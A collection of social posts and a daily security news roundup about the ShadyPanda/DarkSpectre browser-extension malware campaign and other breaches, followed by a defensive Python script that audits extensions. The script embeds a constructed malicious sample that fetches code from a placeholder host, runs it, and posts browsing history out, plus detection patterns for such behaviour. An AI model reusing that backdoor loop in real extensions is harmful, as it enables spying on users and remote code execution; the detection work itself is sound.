#DarkSpectre #Hackers Spread #Malware To 8.8 Million #Chrome, #Edge, and #Firefox Users - Slashdot

According to research by Koi.ai, the group operates three interconnected campaigns: #ShadyPanda, #GhostPoster, and a newly identified one named The #ZoomStealer, forming a single, strategically organized operation.
#security #koiai

https://it.slashdot.org/story/25/12/31/2021253/darkspectre-hackers-spread-malware-to-88-million-chrome-edge-and-firefox-users?utm_source=rss1.0mainlinkanon&utm_medium=feed

DarkSpectre Hackers Spread Malware To 8.8 Million Chrome, Edge, and Firefox Users - Slashdot

An anonymous reader quotes a report from Cyber Press: A newly uncovered Chinese threat group, DarkSpectre, has been linked to one of the most widespread browser-extension malware operations to date, compromising more than 8.8 million users of Chrome, Edge, Firefox, and Opera over the past seven year...

🚨🤖 BREAKING NEWS: "Privacy" extensions are selling your secrets! Who knew that clicking "accept" was basically signing over your soul and deepest thoughts to the #ShadyPanda Corporation? 🐼💼 Now, 8 million of us can enjoy the honor of having our mundane AI conversations peddled for profit. Truly, we're living in the future! 🎉🔐
https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection #PrivacyExtensions #DataSelling #AIConversations #DigitalPrivacy #HackerNews #ngated
8 Million Users' AI Conversations Sold for Profit by "Privacy" Extensions

Privacy browser extensions misled users and sold 8 million AI chat logs, exposing sensitive conversations for profit without consent.

As part of a 7-year #Malware campaign, the #Cybercrime group "#ShadyPanda", believed to originate from #China, managed to infect 4.3 million Chrome and Edge users with malicious browser extensions.

In doing so, a weakness in the app stores' software review was deliberately exploited: only the initial submission is checked, not an app's ongoing behaviour, so an app can later be repurposed as malware:

https://www.darkreading.com/endpoint-security/shadypanda-hackers-weaponize-browsers

7 year long #ShadyPanda attack spied on 4.3 million Google Chrome and Edge users through malicious browser extensions loaded with spyware and RCE backdoors.

Read: https://hackread.com/shadypanda-attack-spied-chrome-edge-users/

#Cybersecurity #Malware #Privacy #Chrome #Edge

7 Year Long ShadyPanda Attack Spied on 4.3M Chrome and Edge Users


Browser extensions pushed malware to 4.3M Chrome, Edge users


A seven-year malicious browser extension campaign infected 4.3 million Google Chrome and Microsoft Edge users with malware, including backdoors and spyware sending people's data to servers in China. The attackers, whom Koi named ShadyPanda, played the long game: publishing legitimate extensions, accumulating thousands or sometimes millions of downloads over several years, and then pushing a malware-laden update that auto-updates across the entire user base.

https://www.theregister.com/2025/12/01/chrome_edge_malicious_browser_extensions/?td=rt-3a

#attack #china #cyber #extension #security #shadypanda

Stealthy browser extensions waited years before infecting 4.3M Chrome, Edge users with backdoors and spyware

And some are still active in the Microsoft Edge store

The Register
Chinese hacker group #ShadyPanda has infected millions of Chrome and Edge users over seven years. The strategy: first publish harmless add-ons, then push malicious updates. https://winfuture.de/news,155328.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia
China hackers secretly attack millions of Chrome and Edge users

An attack on browser extensions that went undetected for years has hit millions of users of Google Chrome and Microsoft Edge. The Chinese actors proceeded with long-term planning in order to generate as many victims as possible.

WinFuture.de

Alright cyber pros, it's been a pretty packed 24 hours! We've got major data breaches impacting millions, new insights into nation-state tactics, a huge takedown of a crypto mixer, and a stark warning about the security implications of agentic AI browsers. Let's dive in:

Major Data Breaches Unfold ⚠️
- South Korean e-commerce giant Coupang, often dubbed the "Amazon of Korea," confirmed a data breach impacting 33.7 million customers, over half the country's population. Exposed data includes names, emails, phone numbers, addresses, and order history, with local reports suggesting a former Chinese employee used unrevoked access tokens.
- The French Football Federation (FFF) also reported a breach of its member management software via a compromised account, exposing personal details like names, gender, DOB, nationality, and contact info for an undisclosed number of its 2.2 million members.
- The popular open-source SmartTube YouTube client for Android TV was compromised after an attacker gained access to the developer's signing keys, pushing a malicious update that included a hidden library for device fingerprinting and remote configuration. Users are urged to revert to older, safe builds and reset Google account passwords.

🗞️ The Record | https://therecord.media/coupang-south-korea-data-breach
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/coupang_breach/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/retail-giant-coupang-suffers-data-breach-impacting-337-million-people/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/french_football_federation_breach/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/smarttube-youtube-app-for-android-tv-breached-to-push-malicious-update/

Nation-State Actors Evolve Tactics 🕵🏼
- North Korea's Lazarus Group is accused by South Korean officials of stealing $30 million from the Upbit cryptocurrency exchange, using tactics similar to a 2019 attack. The group allegedly impersonated administrators to transfer funds, prompting Upbit to suspend services and move assets to cold storage.
- The Tomiris APT, linked to Kazakhstan-based Storm-0473, is increasingly leveraging public services like Telegram and Discord for command-and-control (C2) in attacks targeting government entities and foreign ministries across Central Asia and Russia. This shift aims to blend malicious traffic with legitimate activity, making detection harder.
- Leaked documents, analysed by Iranian opposition activist Nariman Gharib, allegedly link Iran's "Charming Kitten" (APT35) to assassination operations, suggesting compromised airline, hotel, and medical databases are used to locate regime enemies.

🗞️ The Record | https://therecord.media/officials-accuse-north-korea-hackers-of-attack-on-crypto-exchange
📰 The Hacker News | https://thehackernews.com/2025/12/tomiris-shifts-to-public-service.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/

Malicious Browser Extensions Run Rampant 🛡️
- A seven-year-long "ShadyPanda" campaign infected over 4.3 million Chrome and Edge users through 145 seemingly legitimate browser extensions that later pushed malware-laden updates. These extensions evolved from affiliate fraud and search hijacking to deploying remote code execution (RCE) backdoors and spyware.
- The RCE backdoor checks for new instructions hourly, executing arbitrary JavaScript with full browser API access, while spyware components exfiltrate extensive user data including browsing history, keystrokes, and sensitive identifiers to Chinese servers.
- Despite Google removing some, several extensions with millions of installs remain active on the Microsoft Edge Add-ons platform, highlighting a critical gap in ongoing marketplace security reviews post-approval.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/chrome_edge_malicious_browser_extensions/

AI Browsers: A New Security Nightmare 🧠
- The emergence of "agentic" AI browsers, like OpenAI's ChatGPT Atlas, is transforming browsers from passive tools into autonomous AI agents that can perform actions on behalf of users.
- These agents require maximum privileges, including access to session cookies, credentials, and payment details, creating an unprecedented attack surface and bypassing traditional "human-in-the-loop" safeguards and MFA.
- Prompt injection is a significant risk, where hidden text can command the AI to exfiltrate data, and traditional security tools often miss these threats due to a "session gap" where actions occur locally within the browser.

📰 The Hacker News | https://thehackernews.com/2025/12/webinar-agentic-trojan-horse-why-new-ai.html

Data Privacy Under Scrutiny 🔒
- Switzerland's data protection officers (Privatim) have advised public bodies to avoid hyperscale clouds and SaaS, specifically Microsoft 365, for sensitive data due to a lack of true end-to-end encryption, exposure to the US CLOUD Act, and providers' ability to unilaterally change terms.
- Exercise-tracking app Strava is updating its terms of service to require users to accept all risks associated with geolocation features, following past incidents where user data revealed sensitive locations like military bases.
- Edtech provider Illuminate Education settled with the FTC over a 2021 data breach affecting 10.1 million students, with allegations of poor security practices, deceptive claims, and delayed breach notifications (up to two years for some).

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/
🗞️ The Record | https://therecord.media/illuminate-education-data-breach-settlement-ftc

Regulatory Actions and Government Directives 📜
- Singapore's Ministry of Home Affairs has issued directives to Google and Apple, requiring them to prevent fake government messages and spoofed sender names on iMessage and Google Messages, with significant fines for non-compliance.
- Russia's Roskomnadzor has imposed "restrictive measures" on WhatsApp, citing violations of Russian law and its alleged use for terrorism, crime, and espionage, urging users to switch to domestic alternatives and threatening a full block.
- The Israel Defense Forces (IDF) is reportedly banning Android smartphones for top brass, standardising on iOS devices to reduce exposure to surveillance via social media apps.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/asia_tech_news_roundup/
🗞️ The Record | https://therecord.media/russia-whatsapp-restrictions
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/

Law Enforcement Strikes Back 🚨
- A major cryptocurrency mixing service, Cryptomixer, was taken down by Swiss and German law enforcement in "Operation Olympia," seizing three servers, its domain, and €24-29 million in Bitcoin. The service allegedly laundered over €1.3 billion for cybercriminals since 2016.
- South Korean police arrested four individuals for compromising over 120,000 IP cameras, with some suspects creating and selling sexually exploitative videos from intimate locations by exploiting weak passwords.
- In Australia, a man was jailed for over seven years for using "evil twin" Wi-Fi traps at airports and on flights to steal credentials and intimate material, while in the UK, a man received a 6.5-year sentence for operating a dark web drug empire.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/police-takes-down-cryptomixer-cryptocurrency-mixing-service/
🗞️ The Record | https://therecord.media/cryptomixer-service-takedown-bitcoin-seized
🤫 CyberScoop | https://cyberscoop.com/cryptomixer-takedown-seizure-europol/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/cybercrime_arrests_roundup/

Developer Secrets Exposed 🔑
- A security engineer scanned 5.6 million public GitLab repositories and discovered 17,000 verified live secrets, including over 5,000 Google Cloud credentials, 2,000+ MongoDB credentials, and numerous OpenAI, AWS, and Telegram bot tokens.
- The scan, costing about $770 and completed in 24 hours, found GitLab had a 35% higher density of leaked secrets per repository compared to Bitbucket, highlighting a pervasive issue of exposed credentials in public code.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/infosec_news_in_brief/

Teen Cybercrime: Just a Phase? 📊
- A Dutch government report suggests that most adolescent cybercriminals tend to desist from offending by the age of 20, similar to other types of youth crime.
- The study indicates that only about four percent of those who start a "black hat" career maintain it into adulthood, often driven by technological curiosity and skill-building rather than financial gain.
- The report highlights the challenge of quantifying the specific social cost of cybercrime due to a lack of longitudinal data and its rapidly evolving nature, though overall adolescent crime costs the Netherlands €10.3 billion annually.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/01/dutch_study_teen_cybercrime/

#CyberSecurity #ThreatIntelligence #DataBreach #APT #LazarusGroup #Tomiris #ShadyPanda #Malware #BrowserExtensions #RCE #AI #AgenticAI #DataPrivacy #RegulatoryCompliance #LawEnforcement #CryptoMixer #Cybercrime #InfoSec #IncidentResponse
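A defender-side example added here, not code from any of the sources quoted above: a small static audit that flags, in an unpacked extension, the behaviours the "Malicious Browser Extensions" section attributes to the ShadyPanda extensions (broad host permissions, a recurring alarm used to poll for instructions, remote text executed as code, and outbound posting of history or cookie data). The two sample extensions are constructed for the demonstration; the example.invalid hostnames, the pattern list and the risk thresholds are assumptions, and a clean result is not proof that an extension is safe.

```python
"""Static risk audit of an unpacked browser extension (added example).

The extension is passed in as {path: text}. The heuristics look for the
indicators described in the ShadyPanda coverage: broad host permissions,
a periodic alarm that polls for instructions, fetched text turned into
code, and data being posted out of the browser.
"""
import json
import re

# Permissions that expose the data the spyware components collected.
# Assumption: a starting list, not an exhaustive one.
SENSITIVE_PERMISSIONS = {"history", "cookies", "webRequest", "webRequestBlocking", "scripting"}
# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

PATTERNS = {
    # A recurring alarm is how a backdoor checks for new instructions on a schedule.
    "periodic_alarm": re.compile(r"chrome\.alarms\.create\([^)]*periodInMinutes"),
    # Turning a string into code: eval, the Function constructor, or string timers.
    "dynamic_code": re.compile(r"\beval\(|new\s+Function\(|setTimeout\(\s*['\"`]"),
    # Sending data out of the browser.
    "outbound_post": re.compile(r"navigator\.sendBeacon\(|method\s*:\s*['\"]POST['\"]"),
    # Reading browsing history or cookies, or hooking keystrokes.
    "data_access": re.compile(r"chrome\.(history|cookies)\.|addEventListener\(\s*['\"]key"),
}


def audit_extension(files):
    """Return {"findings": [...], "risk": "low"|"medium"|"high"} for one extension."""
    manifest = json.loads(files["manifest.json"])
    findings = []

    perms = set(manifest.get("permissions", []))
    # Manifest V2 lists host patterns under "permissions", V3 under "host_permissions".
    hosts = set(manifest.get("host_permissions", [])) | perms
    if hosts & BROAD_HOSTS:
        findings.append("broad_host_permissions")
    sensitive = sorted(perms & SENSITIVE_PERMISSIONS)
    if sensitive:
        findings.append("sensitive_permissions:" + ",".join(sensitive))

    # Scan every script shipped in the package, not just the declared background script.
    code = "\n".join(text for path, text in files.items() if path.endswith(".js"))
    for name, pattern in PATTERNS.items():
        if pattern.search(code):
            findings.append(name)

    # A timer plus a network fetch plus dynamic code is the remote-instruction loop.
    if {"periodic_alarm", "dynamic_code"} <= set(findings) and "fetch(" in code:
        findings.append("remote_instruction_loop")

    if "remote_instruction_loop" in findings or (
        "dynamic_code" in findings and "broad_host_permissions" in findings
    ):
        risk = "high"
    elif len(findings) >= 2:
        risk = "medium"
    else:
        risk = "low"
    return {"findings": findings, "risk": risk}


# Constructed sample: the behaviour pattern described in the write-ups, with
# a placeholder example.invalid host standing in for any real server.
MALICIOUS_SAMPLE = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Example Helper", "version": "2.0",
        "permissions": ["alarms", "history", "cookies", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "bg.js"},
    }),
    "bg.js": """
chrome.alarms.create('tick', { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch('https://example.invalid/cmd');
  new Function(await r.text())();
  chrome.history.search({ text: '' }, (items) => {
    fetch('https://example.invalid/up', { method: 'POST', body: JSON.stringify(items) });
  });
});
""",
}

# Constructed sample: a minimal extension that only touches the active tab.
BENIGN_SAMPLE = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Word Counter", "version": "1.0",
        "permissions": ["activeTab"], "action": {"default_popup": "popup.html"},
    }),
    "popup.js": "document.getElementById('count').textContent = "
                "document.body.innerText.split(/\\s+/).length;",
}

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, audit_extension(sample))
```

Pointing the audit at a real package means reading the unpacked directory into the same {path: text} mapping; the useful part of the output is the finding names, which tell a reviewer where to look first. Because the approval-time review the articles criticise sees only the first submission, re-running a check like this on each auto-update is what closes the gap they describe.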

Data breach hits 'South Korea's Amazon,' potentially affecting 65% of country’s population

South Korean online retail giant Coupang apologized for a data breach that prompted an emergency meeting by senior government officials.

4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign
#ShadyPanda
https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign

ShadyPanda’s seven-year campaign infected 4.3 million browsers, spreading malware undetected and endangering user security worldwide.